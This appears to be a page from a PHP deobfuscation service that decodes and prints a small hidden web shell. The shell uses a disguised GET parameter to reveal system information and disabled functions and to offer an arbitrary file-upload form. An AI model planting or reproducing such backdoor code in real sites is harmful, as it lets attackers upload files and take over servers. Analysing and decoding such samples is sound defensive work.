Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); $qw = ('ab') ;$we = ('l') ;$rt = ('k') ;$yu = ('a') ;$de = ('..

Decoded Output download

<font color=#FFFFFF>[uname]Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686[/uname]

Did this file decode correctly?

Original Code

<?php 
error_reporting(0);
$qw = ('ab') ;$we = ('l') ;$rt = ('k') ;$yu = ('a') ;$de = ('re') ;$rtt =('m');$mu = ('dul') ;$krd = $qw.$mu.$we.$rt.$re.$yu.$de.$rtt ;$muhmad = $krd ;
if(isset($_GET[$muhmad]))
	{
		echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
		print "\n";$disable_functions = @ini_get("disable_functions"); 
		echo "DisablePHP=".$disable_functions; print "\n"; 
		echo"<form method=post enctype=multipart/form-data>"; 
		echo"<input type=file name=f><input name=v type=submit id=v value=up><br>"; 
		  if($_POST["v"]==up)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} } ?>

Function Calls

ini_get 1
php_uname 1
error_reporting 1

Variables

$de re
$mu dul
$qw ab
$rt k
$we l
$yu a
$krd abdullk0arem
$rtt m
$muhmad abdullk0arem

Stats

MD5 98b0999771739ed514f568fe6a413a11
Eval Count 0
Decode Time 100 ms